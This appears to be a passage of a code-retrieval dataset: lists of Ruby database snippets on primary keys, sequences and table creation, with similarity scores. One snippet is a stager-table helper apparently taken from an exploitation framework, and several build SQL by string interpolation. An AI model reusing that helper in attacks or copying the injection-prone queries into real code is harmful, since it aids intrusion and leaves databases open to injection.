"def reset_id\n ActiveRecord::Base.connection.execute(\\\n #'ALTER TABLE category AUTO_INCREMENT = 1')\n # \"DELETE FROM sqlite_sequence WHERE NAME = 'cate'\")\n # \"DELETE FROM sqlite_sequence WHERE NAME = 'categories'\")\n \"DELETE FROM categories; DELETE FROM sqlite_sequence WHERE NAME = 'categories'\")\n \n #\n # @adapter = ActiveRecord::Base.connection.adapter_name\n# \n # @key = maximum(primary_key)\n\n end",
"def add_big_primary_key(table_name, key_name)\n execute(<<-end_sql)\n alter table #{table_name} add column #{key_name} bigint not null auto_increment primary key\n end_sql\n end",
"def reset_sequence_numbers\n result = Database.connection.exec(\"SELECT table_name FROM information_schema.tables WHERE table_schema = 'public';\")\n table_names = result.map { |row| row.values_at('table_name')[0] }\n\n table_names_with_id_column = table_names.select do |table_name|\n result = Database.connection.exec(\"SELECT column_name FROM information_schema.columns WHERE table_name = '#{table_name}';\")\n column_names = result.map { |row| row.values_at('column_name')[0] }\n column_names.include?('id')\n end\n\n table_names_with_id_column.each do |table_name|\n result = Database.connection.exec(\"SELECT pg_get_serial_sequence('#{table_name}', 'id');\")\n sequence_name = result.getvalue(0, 0)\n Database.connection.exec(\"SELECT setval('#{sequence_name}', (select MAX(id) from #{table_name}));\")\n end\n end",
"def insert_statement(model, properties, serial)\n statement = \"\"\n # Check if there is a serial property being set directly\n require_identity_insert = !properties.empty? && properties.any? { |property| property.serial? }\n set_identity_insert(model, statement, true) if require_identity_insert\n statement << super\n set_identity_insert(model, statement, false) if require_identity_insert\n statement\n end",
"def primary_key(value=nil)\n self.primary_key = value unless value.nil?\n \n @primary_key ||= :id\n end",
"def force_primary_key(klass)\n # Automatically add an :oid serializable field if none is\n # defined and no other primary key is defined.\n if klass.primary_key == :oid and !klass.instance_attributes.include?(:oid)\n klass.attr_accessor :oid, Fixnum, :sql => primary_key_type\n end\n end",
"def primary_key(table_name)\n pk_and_sequence = pk_and_sequence_for(table_name)\n pk_and_sequence && pk_and_sequence.first\n end",
"def primary_key(table)\n pk_and_sequence = pk_and_sequence_for(table)\n pk_and_sequence && pk_and_sequence.first\n end",
"def insert_pk\n (f = opts[:from]) && !f.empty? && (t = f.first)\n case t\n when Symbol, String, SQL::Identifier, SQL::QualifiedIdentifier\n if pk = db.primary_key(t)\n Sequel::SQL::Identifier.new(pk)\n end\n end\n end",
"def convert_serial_to_identity(table, opts=OPTS)\n raise Error, \"convert_serial_to_identity is only supported on PostgreSQL 10.2+\" unless server_version >= 100002\n\n server = opts[:server]\n server_hash = server ? {:server=>server} : OPTS\n ds = dataset\n ds = ds.server(server) if server\n\n raise Error, \"convert_serial_to_identity requires superuser permissions\" unless ds.get{current_setting('is_superuser')} == 'on'\n\n table_oid = regclass_oid(table)\n im = input_identifier_meth\n unless column = (opts[:column] || ((sch = schema(table).find{|_, sc| sc[:primary_key] && sc[:auto_increment]}) && sch[0]))\n raise Error, \"could not determine column to convert from serial to identity automatically\"\n end\n column = im.call(column)\n\n column_num = ds.from(:pg_attribute).\n where(:attrelid=>table_oid, :attname=>column).\n get(:attnum)\n\n pg_class = Sequel.cast('pg_class', :regclass)\n res = ds.from(:pg_depend).\n where(:refclassid=>pg_class, :refobjid=>table_oid, :refobjsubid=>column_num, :classid=>pg_class, :objsubid=>0, :deptype=>%w'a i').\n select_map([:objid, Sequel.as({:deptype=>'i'}, :v)])\n\n case res.length\n when 0\n raise Error, \"unable to find related sequence when converting serial to identity\"\n when 1\n seq_oid, already_identity = res.first\n else\n raise Error, \"more than one linked sequence found when converting serial to identity\"\n end\n\n return if already_identity\n\n transaction(server_hash) do\n run(\"ALTER TABLE #{quote_schema_table(table)} ALTER COLUMN #{quote_identifier(column)} DROP DEFAULT\", server_hash)\n\n ds.from(:pg_depend).\n where(:classid=>pg_class, :objid=>seq_oid, :objsubid=>0, :deptype=>'a').\n update(:deptype=>'i')\n\n ds.from(:pg_attribute).\n where(:attrelid=>table_oid, :attname=>column).\n update(:attidentity=>'d')\n end\n\n remove_cached_schema(table)\n nil\n end",
"def primary_key\n '_id'\n end",
"def insert(sql, name = nil, pk = nil, id_value = nil, sequence_name = nil)\n table = sql.split(\" \", 4)[2]\n super || last_insert_id(table, sequence_name || default_sequence_name(table, pk))\n end",
"def orchestrate_primary_key\n id\n end",
"def quoted_primary_key\n @quoted_primary_key ||= connection.quote_column_name(primary_key)\n end",
"def save\n sql = <<-SQL\n INSERT INTO students (name, grade)\n VALUES (?,?)\n SQL\n\n DB[:conn].execute(sql, self.name, self.grade)\n\n @id = DB[:conn].execute(\"SELECT last_insert_rowid() FROM students\")[0][0]\nend",
"def primary_key!\n @primary_keys << @name\n end",
"def create\r\n if self.id.nil? && connection.prefetch_primary_key?(self.class.table_name)\r\n self.id = connection.next_sequence_value(self.class.sequence_name)\r\n end\r\n\r\n quoted_attributes = attributes_with_quotes\r\n\r\n statement = if quoted_attributes.empty?\r\n connection.empty_insert_statement(self.class.table_name)\r\n else\r\n \"INSERT INTO #{self.class.quoted_table_name} \" +\r\n \"(#{quoted_column_names.join(', ')}) \" +\r\n \"VALUES(#{quoted_attributes.values.join(', ')})\"\r\n end\r\n\r\n self.id = connection.insert(statement, \"#{self.class.name} Create\",\r\n self.class.primary_key, self.id, self.class.sequence_name)\r\n\r\n @new_record = false\r\n id\r\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n self.class.primary_key\n end",
"def increment_sequence_number\n @sequence_number += 1\n @sequence_number = 0 if @sequence_number > 0xFFFFFFFF\n end",
"def uses_sequence\n select_value(\"SELECT name FROM sqlite_master WHERE type='table' AND name='sqlite_sequence';\")\n end",
"def type_literal_generic_integer(column)\n column[:serial] ? :serial : super\n end",
"def type_literal_generic_integer(column)\n column[:serial] ? :serial : super\n end",
"def primary_key\n @primary_key\n end",
"def insert_pk\n if (f = opts[:from]) && !f.empty?\n case t = f.first\n when Symbol, String, SQL::Identifier, SQL::QualifiedIdentifier\n if pk = db.primary_key(t)\n pk\n end\n end\n end\n end",
"def schema_autoincrementing_primary_key?(schema)\n !!(schema[:primary_key] && schema[:auto_increment])\n end",
"def insert(*args)\n r = super\n if s = opts[:sequence]\n with_sql(\"SELECT #{literal(s)}.currval FROM dual\").single_value.to_i\n else\n r\n end\n end",
"def change_sequence(name, options = {})\n execute change_sequence_sql(name, options)\n end",
"def save\n sql = <<-SQL\n INSERT INTO #{self.table_name_for_insert} (#{self.col_names_for_insert})\n VALUES (#{self.values_for_insert})\n SQL\n\n DB[:conn].execute(sql)\n @id = DB[:conn].execute(\"SELECT last_insert_rowid() FROM #{self.table_name_for_insert}\")[0][0]\n end",
"def insert_statement(model, properties, serial)\n statement = \"INSERT INTO #{quote_name(model.storage_name(name))} \"\n\n custom_sequence = serial && serial.options[:sequence]\n\n if supports_default_values? && properties.empty? && !custom_sequence\n statement << \"(#{quote_name(serial.field)}) \" if serial\n statement << default_values_clause\n else\n # do not use custom sequence if identity field was assigned a value\n if custom_sequence && properties.include?(serial)\n custom_sequence = nil\n end\n statement << \"(\"\n if custom_sequence\n statement << \"#{quote_name(serial.field)}\"\n statement << \", \" unless properties.empty?\n end\n statement << \"#{properties.map { |p| quote_name(p.field) }.join(', ')}) \"\n statement << \"VALUES (\"\n if custom_sequence\n statement << \"#{quote_name(custom_sequence)}.NEXTVAL\"\n statement << \", \" unless properties.empty?\n end\n statement << \"#{(['?'] * properties.size).join(', ')})\"\n end\n\n if supports_returning? && serial\n statement << returning_clause(serial)\n end\n\n statement\n end",
"def pk_and_sequence_for(table) #:nodoc:\n result = query(<<-end_sql, 'PK and serial sequence')[0]\n SELECT columns.column_name, columns.column_default \n FROM primary_keys \n LEFT JOIN columns \n USING(table_name, column_name)\n WHERE primary_keys.table_name = '#{table_name.gsub(/(^\"|\"$)/,'')}'\n end_sql\n \n if result.length == 0\n return nil\n elsif result[0][1].nil?\n return nil\n else\n default_value = result[0][1]\n seq_name = default_value.match(/\\(\\'(\\w+)\\'\\)/).to_a.last\n return [result[0][0], seq_name]\n end\n rescue\n nil\n end",
"def property_schema_statement(schema)\n statement = super\n\n if schema.has_key?(:sequence_name)\n statement << \" DEFAULT nextval('#{schema[:sequence_name]}') NOT NULL\"\n end\n\n statement\n end",
"def primary_key(_table_name)\n []\n end",
"def last_insert_id(sequence_name)\n r = exec_query(\"SELECT currval('#{sequence_name}')\", 'SQL')\n Integer(r.rows.first.first)\n end",
"def sequence_number; end",
"def assign_tx_seq_num\n self.update(tx_seq_num: Order.max_tx_seq_num + 1) \n end",
"def primary_key_attribute\n :id\n end",
"def primary_key\n @primary_key ||= @klass.primary_key.to_s\n end",
"def primary_key\n fail NotImplementedError\n end",
"def create_sequence(repository, property)\n return if sequence_exists?(repository, property)\n execute(create_sequence_statement(repository, property))\n end"
] |
[
"0.71952075",
"0.71952075",
"0.71893656",
"0.71893656",
"0.70656824",
"0.6960461",
"0.69145495",
"0.69145495",
"0.68647623",
"0.68647623",
"0.68033075",
"0.67720366",
"0.65689373",
"0.6540689",
"0.65311176",
"0.6473395",
"0.6473395",
"0.642823",
"0.6426254",
"0.64066917",
"0.63104767",
"0.6309169",
"0.6242477",
"0.62400544",
"0.6203635",
"0.6189762",
"0.6166343",
"0.61524075",
"0.6147001",
"0.6147001",
"0.61204827",
"0.61091477",
"0.609349",
"0.6076748",
"0.6071671",
"0.6071224",
"0.603884",
"0.59536356",
"0.59536356",
"0.59508437",
"0.5927169",
"0.5903433",
"0.5897217",
"0.5889615",
"0.5864631",
"0.5854951",
"0.58529025",
"0.5830269",
"0.58155584",
"0.5776988",
"0.57764",
"0.5770577",
"0.57401407",
"0.5721618",
"0.5720996",
"0.5708285",
"0.5695692",
"0.5672711",
"0.5672711",
"0.5671217",
"0.5650326",
"0.5649192",
"0.5637172",
"0.5633245",
"0.56324863",
"0.5623073",
"0.5611988",
"0.56106746",
"0.5606156",
"0.55966324",
"0.5578386",
"0.5576882",
"0.557343",
"0.55698955",
"0.5566188",
"0.5559156",
"0.5544551",
"0.5544551",
"0.5544551",
"0.55349493",
"0.5531298",
"0.5529431",
"0.5529431",
"0.5519675",
"0.54994583",
"0.5490993",
"0.54741657",
"0.5461575",
"0.5437435",
"0.54358065",
"0.5434331",
"0.5433339",
"0.54229516",
"0.54216075",
"0.5419744",
"0.5409058",
"0.5408901",
"0.5405676",
"0.5405085",
"0.5398232"
] |
0.645073
|
17
|
The version of the PostgreSQL server, used for determining capability.
|
def server_version(server=nil)
return @server_version if @server_version
ds = dataset
ds = ds.server(server) if server
@server_version = swallow_database_error{ds.with_sql("SELECT CAST(current_setting('server_version_num') AS integer) AS v").single_value} || 0
end
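
A minimal usage sketch (the connection URL is hypothetical) of how the cached integer feeds feature gating. Pre-10 releases encode major*10000 + minor*100 + patch (9.1.0 is 90100); from 10 on it is major*10000 + minor (10.2 is 100002). A failed lookup falls back to 0 via swallow_database_error:

require 'sequel'

DB = Sequel.connect('postgres://localhost/example') # hypothetical URL

ver = DB.server_version   # e.g. 120005 on PostgreSQL 12.5
puts ver >= 100002        # true when identity columns can replace SERIAL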
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def server_version\n db.server_version(@opts[:server])\n end",
"def version\n @version ||= exec('SHOW server_version')[0]['server_version'].split[0]\n end",
"def get_server_version\n server_info[:server_version]\n end",
"def server_version; end",
"def server_version\n ServerVersion.new(server_info[\"version\"])\n end",
"def oracle_server_vernum()\n #This is a stub, used for indexing\n end",
"def target_postgresql_version; end",
"def server_version\n check_connection\n @protocol.server_version\n end",
"def postgresql_version\n 100000\n end",
"def server_version\n request(auth: false, expects: 200)['version']\n rescue => ex\n error { \"Server version exception\" }\n error { ex }\n nil\n end",
"def server_version\n server_info.present? ? @server_info[:parseServerVersion] : nil\n end",
"def postgresql_version\n if undecorated_connection.respond_to?(:postgresql_version)\n super\n else\n undecorated_connection.send(:postgresql_version)\n end\n end",
"def postgresql_version\n if undecorated_connection.respond_to?(:postgresql_version)\n super\n else\n undecorated_connection.send(:postgresql_version)\n end\n end",
"def server_pkg_name\n platform_family?('debian') ? \"postgresql-#{new_resource.version}\" : \"postgresql#{new_resource.version.delete('.')}-server\"\n end",
"def db_version\n migration_meta_node[:_db_version]\n end",
"def server_version(_server=nil)\n @server_version ||= super()\n end",
"def target_postgresql_version=(_arg0); end",
"def server_version\n call! :server_version\n end",
"def server_version(server=nil)\n @server_version ||= (synchronize(server){|conn| conn.info[:id]})\n end",
"def schema_version\n exec_one_result( \"SELECT schema_version FROM info\" )\n end",
"def version\n VERSION\n end",
"def version\n detect_product('GSA').version\n end",
"def version\n VERSION\n end",
"def database_version\n raise NoMethodError, \"Not implemented for this raw driver\"\n end",
"def version_number\n @version\n end",
"def server_version\n status['value']['build']['version']\n end",
"def version\n @version\n end",
"def version\n @db.send(:get_int_pragma, 'user_version')\n end",
"def version\n driver.getVersion\n end",
"def version\n return @version\n end",
"def version\n return @version\n end",
"def version\n return @version\n end",
"def version\n return @version\n end",
"def version\n return @version\n end",
"def version\n return @version\n end",
"def version\n return @version\n end",
"def version\n return @version\n end",
"def version\n return @version\n end",
"def version\n [@major_version, @minor_version].join('.')\n end",
"def version\n [ V1_4.raptor_version_major,\n V1_4.raptor_version_minor,\n V1_4.raptor_version_release ].join('.')\n end",
"def version\n @version ||= version_hex.to_s(16).chars.entries.join('.')\n end",
"def engine_version\n @dbi.engine_version\n end",
"def engine_version\n @dbi.engine_version\n end",
"def old_postgresql_datadir_version\n pg_version = old_postgres_data_dir/\"PG_VERSION\"\n pg_version.exist? && pg_version.read.chomp\n end",
"def version\n VERSION\n end",
"def version\n VERSION\n end",
"def version\n VERSION\n end",
"def platform_service_name(version = node.run_state['postgresql']['version'])\n case node['platform_family']\n when 'rhel', 'fedora'\n \"postgresql-#{version}\"\n when 'amazon'\n if node['virtualization']['system'] == 'docker'\n \"postgresql#{version.delete('.')}\"\n else\n \"postgresql-#{version}\"\n end\n else\n 'postgresql'\n end\n end",
"def compact_pg_version\n pg_version.gsub('.','')\n end",
"def version\n read_property 'Version'\n end",
"def engine_version\n stats.version\n end",
"def client_version\n ClientVersion\n end",
"def version\n @version ||= __determine_version\n end",
"def version_number\n return @version_number\n end",
"def fcv_ish\n if server_version >= '3.4' && !mongos?\n fcv\n else\n if short_server_version == '4.1'\n '4.2'\n else\n short_server_version\n end\n end\n end",
"def version\n case @version\n when Module\n \"#{@version::Major}.#{@version::Minor}.#{@version::Release}\"\n when Proc # not sure about this\n @version.call\n when NilClass\n 'unknown'\n else\n @version\n end\n end",
"def version\n return last_version if versionable?\n version_number\n end",
"def environment_version\n metadata[:environment_version]\n end",
"def version\n @version || 0\n end",
"def version\n self[:version]\n end",
"def client_meta_version(version)\n regexp = /^([0-9]+\\.[0-9]+\\.[0-9]+)(\\.?[a-z0-9.-]+)?$/\n match = version.match(regexp)\n return \"#{match[1]}p\" if (match[2])\n\n version\n end",
"def version\n cmd(COMMANDS[:version], 2)\n end",
"def version\n (version_from_class.to_f / 10).to_s\n end",
"def version\n @__version\n end",
"def version\n @table[:version] ||= Version::Number.new('0.0.0')\n end",
"def version\n options['version']\n end",
"def version\n ret = @client.call('Bugzilla.version')\n handle_faults(ret)\n ret['version']\n end",
"def mssql_version\n @mssql_version ||=\n begin\n query('SELECT @@version')[0][0] =~ /(\\d+)\\.(\\d+)\\.(\\d+).(\\d+)/\n [$1, $2, $3, $4]\n rescue\n [0, 0, 0, 0]\n end\n end",
"def version\n app = detect_product(GSA) || detect_product(GOOGLEPODCASTS)\n app.version\n end",
"def versionString()\n\t\t\t\treturn \"#{major}.#{minor}.#{build}\"\n\t\t\tend",
"def version\n \"rs_connect #{right_link_version} - RightLink's server importer (c) 2014 RightScale\"\n end",
"def major_version; end",
"def version\n fetch('vehicle.version')\n end",
"def current_version\n @version\n end",
"def version\n @version ||= create_version\n end",
"def version\n values = {}\n ring.servers.each do |server|\n values[server.name.to_s] = server.alive? ? server.request(:version) : nil\n end\n values\n end",
"def version\n version_property ? version_property.ruby_value : nil\n end",
"def puppetserver_version_on(host)\n result = on(host, 'puppetserver --version', accept_all_exit_codes: true)\n if result.exit_code.zero?\n matched = result.stdout.strip.scan(/\\d+\\.\\d+\\.\\d+/)\n return matched.first\n end\n nil\n end",
"def version\n if browser == \"Chrome\"\n chrome.version\n elsif product = detect_product(\"Version\")\n product.version\n else\n BuildVersions[build]\n end\n end",
"def version\n 1\n end",
"def perl_version\n `perl --version 2>&1`.match(/\\(v([\\d\\.]+)\\)/)[1]\n end",
"def version\n name.split('_')[1]\n end",
"def platform_version\n return @platform_version\n end",
"def app_version\n return @app_version\n end",
"def app_version\n return @app_version\n end",
"def version\n @context[:version]\n end",
"def version\n exec(:version).readline =~ /^gpg \\(GnuPG\\) (.*)$/ ? $1 : nil\n end",
"def version\n echo_rosh_command\n\n @version ||= adapter.current_version\n end",
"def engine_version\n endpoint.engine_version\n end",
"def version\n @version ||= '1.0'\n end",
"def version\n self.class.version\n end",
"def engine_version\n Agent.engine_version_for_user_agent string\n end",
"def calabash_server_version\n version = nil\n executables.each do |executable|\n version = strings(executable).server_version\n break if version\n end\n version\n end",
"def engine_version\n data[:engine_version]\n end",
"def engine_version\n data[:engine_version]\n end",
"def server\n @database.server\n end",
"def server\n @database.server\n end",
"def hypervisor_version\n output_ptr = FFI::MemoryPointer.new(:ulong)\n FFI::Libvirt.virConnectGetVersion(pointer, output_ptr)\n FFI::Libvirt::Util.parse_version_number(output_ptr.get_ulong(0))\n end",
"def version\n execute_string(\"-version\")\n end",
"def version\n versions.last.miq_semver.split(\".\").first + \".0.0\"\n end"
] |
[
"0.8236167",
"0.82214254",
"0.77873117",
"0.74867266",
"0.74571335",
"0.73964053",
"0.7312636",
"0.7275439",
"0.7234323",
"0.72188014",
"0.7165389",
"0.7121293",
"0.7120812",
"0.71062684",
"0.7072108",
"0.7003863",
"0.7002735",
"0.6965803",
"0.69554186",
"0.69160396",
"0.6834642",
"0.6760121",
"0.67354983",
"0.668943",
"0.6677263",
"0.6674097",
"0.6665022",
"0.6649005",
"0.6619632",
"0.6589865",
"0.6589865",
"0.6589865",
"0.6589865",
"0.6589865",
"0.6589865",
"0.6589865",
"0.6589865",
"0.6589865",
"0.65857345",
"0.65746427",
"0.65471363",
"0.6546658",
"0.6546658",
"0.6534584",
"0.6533424",
"0.6533424",
"0.6533424",
"0.65249187",
"0.6515641",
"0.6514041",
"0.65037894",
"0.65033764",
"0.64991164",
"0.64852005",
"0.6469573",
"0.6438663",
"0.6421838",
"0.64173675",
"0.6400705",
"0.63967",
"0.6384967",
"0.6373156",
"0.63695234",
"0.6343087",
"0.6339712",
"0.6336708",
"0.6325522",
"0.6303778",
"0.6303203",
"0.6296407",
"0.6287402",
"0.62726235",
"0.6268262",
"0.6267251",
"0.62547016",
"0.62520075",
"0.6234216",
"0.62325764",
"0.62285846",
"0.6223968",
"0.6221551",
"0.62203515",
"0.62153864",
"0.6204905",
"0.6204905",
"0.6203381",
"0.6192019",
"0.618432",
"0.6183588",
"0.61824566",
"0.61820054",
"0.6180807",
"0.6174003",
"0.6173591",
"0.6173591",
"0.6165258",
"0.6165258",
"0.61627465",
"0.61500204",
"0.61479557"
] |
0.7409582
|
5
|
PostgreSQL supports CREATE TABLE IF NOT EXISTS on 9.1+
|
def supports_create_table_if_not_exists?
server_version >= 90100
end
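
A minimal sketch (the connection URL is hypothetical) of the predicate in use: Sequel's create_table? consults it, emitting a single CREATE TABLE IF NOT EXISTS on 9.1+ and falling back to a table_exists? check plus a plain CREATE TABLE on older servers:

require 'sequel'

DB = Sequel.connect('postgres://localhost/example') # hypothetical URL

DB.create_table?(:logs) do
  primary_key :id
  String :message
end
# 9.1+:  CREATE TABLE IF NOT EXISTS "logs" (...)
# < 9.1: table_exists?(:logs) check, then CREATE TABLE "logs" (...)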
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def supports_create_table_if_not_exists?\n true\n end",
"def supports_create_table_if_not_exists?\n false\n end",
"def supports_drop_table_if_exists?\n supports_create_table_if_not_exists?\n end",
"def create_table?(*args, &block)\n create_table(*args, &block) unless table_exists?\n end",
"def supports_drop_table_if_exists?\n true\n end",
"def supports_drop_table_if_exists?\n true\n end",
"def create_table?(name, options=OPTS, &block)\n if options[:partition_of]\n create_table(name, options.merge!(:if_not_exists=>true), &block)\n return\n end\n\n super\n end",
"def create_table (table_name)\r\n\t\"CREATE TABLE IF NOT EXISTS \" + table_name + \r\n\t\"(\r\n\tid INTEGER PRIMARY KEY,\r\n\ttitle VARCHAR(255),\r\n\tcode VARCHAR(255)\r\n\t)\"\r\nend",
"def create_table?(*args, &block)\n if !db.table_exists?(model.table_name)\n create_table(*args, &block)\n end\n end",
"def create_table_prefix_sql(name, options)\n \"CREATE #{temporary_table_sql if options[:temp]}TABLE#{' IF NOT EXISTS' if options[:if_not_exists]} #{options[:temp] ? quote_identifier(name) : quote_schema_table(name)}\"\n end",
"def create_table!(*args, &block)\n drop_table?\n create_table(*args, &block)\n end",
"def create_cache_table(database_url_or_options = {}, options = {})\n @pg.exec(%{\n CREATE UNLOGGED TABLE #{@table_name} (\n key text UNIQUE NOT NULL,\n value bytea NULL\n );\n })\n return true\n end",
"def create_table\n unless table_exists?\n key_options = connection.internal_string_options_for_primary_key\n\n connection.create_table(table_name, id: false) do |t|\n t.string :key, key_options\n t.string :value\n t.timestamps\n end\n end\n end",
"def create!(db, colls = nil)\n db.in_transaction do |conn|\n raise StandardError.new(\"Schema #{name} already created!\") unless schema_tables(conn).empty?\n end\n\n osm2pgsql_exec db, \"'#{empty_file}'\", \"creating osm2pgsql schema\"\n end",
"def test_drop_table_if_exists\n connection.create_table(:testings)\n assert connection.table_exists?(:testings)\n connection.drop_table(:testings, if_exists: true)\n assert_not connection.table_exists?(:testings)\n end",
"def create_join_table?(hash, options=OPTS)\n if supports_create_table_if_not_exists? && options[:no_index]\n create_join_table(hash, options.merge(:if_not_exists=>true))\n elsif !table_exists?(join_table_name(hash, options))\n create_join_table(hash, options)\n end\n end",
"def create_products_table\n c = PGconn.new(:host => \"localhost\", :dbname => dbname)\n c.exec %q{\n CREATE TABLE products (\n id SERIAL PRIMARY KEY,\n name varchar(255),\n price decimal,\n description text\n );\n }\n c.close\nend",
"def create_book_condition(db)\r\n create_book_condition_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS book_condition(\r\n condition_id INTEGER PRIMARY KEY,\r\n condition_desc text(20)\r\n )\r\n SQL\r\n #create book_condition table\r\n db.execute(create_book_condition_cmd)\r\nend",
"def executeNoArgs\n db =Rho::Database.new(Rho::Application.databaseFilePath('local'), \"local\");\n \n tableName = Library.getRandomName\n puts \"Table Name #{tableName}\"\n \n db.executeSql(\"CREATE TABLE #{tableName}(x INTEGER, y TEXT)\") \n data = db.isTableExist(tableName)\n \n puts \"#{data}\"\n data\nend",
"def postgres_create_stager_table\n tbl = Rex::Text.rand_text_alpha(8).downcase\n fld = Rex::Text.rand_text_alpha(8).downcase\n resp = postgres_query(\"create temporary table #{tbl}(#{fld} text)\")\n if resp[:sql_error]\n print_error resp[:sql_error]\n return false\n end\n return [tbl,fld]\n end",
"def create_table\n puts \"Creating table >> PEOPLE\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def table_exists?\n true\n end",
"def create_table\n puts \"Creating people table\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def create_table_prefix_sql(name, options)\n prefix_sql = if options[:temp]\n raise(Error, \"can't provide both :temp and :unlogged to create_table\") if options[:unlogged]\n raise(Error, \"can't provide both :temp and :foreign to create_table\") if options[:foreign]\n temporary_table_sql\n elsif options[:foreign]\n raise(Error, \"can't provide both :foreign and :unlogged to create_table\") if options[:unlogged]\n 'FOREIGN '\n elsif options[:unlogged]\n 'UNLOGGED '\n end\n\n \"CREATE #{prefix_sql}TABLE#{' IF NOT EXISTS' if options[:if_not_exists]} #{options[:temp] ? quote_identifier(name) : quote_schema_table(name)}\"\n end",
"def create_table!\n return true unless Fathom.config.uses_sqlite_optimizer\n value = Fathom.config.db.execute(table_creation_sql)\n end",
"def ensure_table\n # Check if table exists\n if !@db.tables || !@db.tables.include?(table_name)\n log(\"Creating Table #{table_name}\")\n adaptor_name = @adaptor.adaptor_name\n @db.create_table(table_name) do\n # guid id\n column :id, String, :unique => true, :null => false, :primary_key => true\n\n # When using underscore notation on a field that does not exist, the\n # data will be stored in extra.\n if adaptor_name == 'postgres'\n # Use jsonb\n column :extra, 'json'\n else\n column :extra, String\n end\n end\n # TODO: there's some issue with @db.schema and no clue why, but I\n # have to run this again to get .schema to work later.\n @db.tables\n end\n end",
"def create_movies_table\n c = PGconn.new(:host => \"localhost\", :dbname => \"test\")\n c.exec %q{\n CREATE TABLE movies (\n id PRIMARY KEY,\n title TEXT,\n description TEXT,\n rating INTEGER\n );\n }\n c.close\nend",
"def create_new_table(table_sql)\n begin\n do_sql_command(table_sql)\n LOGGER.info \"Successfully reated new table: \\n#{table_sql}\\n\"\n rescue Mysql::Error\n if ($!.to_s =~ /^Table .* already exists$/) == 0\n LOGGER.warn \"Database error, duplicate table is okay, moving on: #{$!}\"\n else\n LOGGER.error \"Database error, moving on: #{$!}\"\n end\n end\nend",
"def create_database_if_missing\n result = PG.connect.exec \"select count(*) as db_exists from pg_database where datname = '#{db_name}'\"\n if result[0]['db_exists'] == '0'\n `createdb #{db_name}`\n `echo 'create extension postgis' | psql #{db_name}`\n @log.warn \"Created database #{db_name}.\"\n end\n end",
"def createUserTable\n @conn.exec(\"CREATEE users (id serial NOT NULL, name character varying(255), CONSTRAINT users_pkey PRIMARY KEY (id)) WITH (OIDS=FALSE);\");\n end",
"def create_side_table\n RailsRedshiftReplicator.connection.exec \"CREATE TABLE #{temporary_table_name} (LIKE #{replication.target_table})\"\n end",
"def create_table(name, &block)\n DB.drop_table? name if @opts.drop_tables?\n DB.create_table? name.to_sym, &block\n info \"Setup database table: #{name}\"\n end",
"def create_database\n $conn.exec(\"\"\"\n CREATE TABLE users (\n id SERIAL NOT NULL,\n name varchar(255) NOT NULL,\n created_at timestamp NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE UNIQUE INDEX user_names ON users (name);\n CREATE TABLE blathers (\n id SERIAL NOT NULL,\n text varchar(141) NOT NULL,\n created_at timestamp NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE TABLE blathers_mentioned_users (\n blather_id integer NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (blather_id, user_id)\n );\n \"\"\")\nend",
"def create_table(table)\n db_client.query(\"SHOW CREATE TABLE #{table['name']}\").first['Create Table'] + ';'\n end",
"def create_table\n if TinyDyno::Adapter.table_exists?(table_name: self.table_name)\n return true\n end\n raise InvalidTableDefinition.new \"#{ self.name } has invalid table configuration\" unless model_table_config_is_valid?\n TinyDyno::Adapter.create_table(create_table_request)\n end",
"def create_table(create_table_options = {})\n self.connection.create_table(table_name, create_table_options) do |t|\n t.column :undone, :boolean, :default => false, :null => false\n t.column :description, :string\n t.column :updated_at, :timestamp\n end\n end",
"def create_user_table(database)\n\tcreate_user_table_cmd = <<-SQL \n\tCREATE TABLE IF NOT EXISTS users(\n\t\tid INTEGER PRIMARY KEY,\n\t\tname VARCHAR(255) UNIQUE\n\t)\nSQL\n\tdatabase.execute(create_user_table_cmd)\nend",
"def create_table!(name, &block)\n drop_table(name) rescue nil\n create_table(name, &block)\n end",
"def create_table\n sql = \"create table if not exists checksums (\n date varchar(25),\n basename varchar(70),\n suitename varchar(20),\n mtime varchar(25),\n md5 varchar(32),\n sha1 varchar(40),\n sha256 varchar(64)\n )\"\n @pkgdb.query(sql)\n end",
"def create\n if @db.table_info(METADATA_TABLE_NAME).empty?\n stmt = \"CREATE TABLE #{METADATA_TABLE_NAME} (key VARCHAR(1024), val VARCHAR(8192), env VARCHAR(255))\"\n @db.execute(stmt)\n end\n\n if @db.table_info(RUN_HISTORY_TABLE_NAME).empty?\n stmt = \"CREATE TABLE #{RUN_HISTORY_TABLE_NAME} (name VARCHAR(1024), outcome VARCHAR(16), env VARCHAR(255), time DATETIME)\"\n @db.execute(stmt)\n\n index_stmt = \"CREATE INDEX index_run_history ON #{RUN_HISTORY_TABLE_NAME} (time DESC)\"\n @db.execute(index_stmt)\n end\n\n if @db.table_info(DISABLED_MONITOR_TABLE_NAME).empty?\n stmt = \"CREATE TABLE #{DISABLED_MONITOR_TABLE_NAME} (name VARCHAR(1024), env VARCHAR(255))\"\n @db.execute(stmt)\n end\n\n if @db.table_info(MONITOR_INFO_TABLE_NAME).empty?\n stmt = \"CREATE TABLE #{MONITOR_INFO_TABLE_NAME} (name VARCHAR(1024), description VARCHAR(8192))\"\n @db.execute(stmt)\n end\n end",
"def create_schema\n puts \"Preparing table\"\n\n \tquery = <<-QUERY\n \t\tCREATE TABLE tasks (\n \t\t\tid INTEGER PRIMARY KEY,\n \t\t\ttitle TEXT NOT NULL,\n \t\t\tdescription TEXT,\n \t\t\tcompleted TEXT\n \t\t);\n \tQUERY\n db.execute(\"DROP TABLE IF EXISTS tasks;\")\n \tdb.execute(query)\n\n puts \"Table creation completed!\"\n\n end",
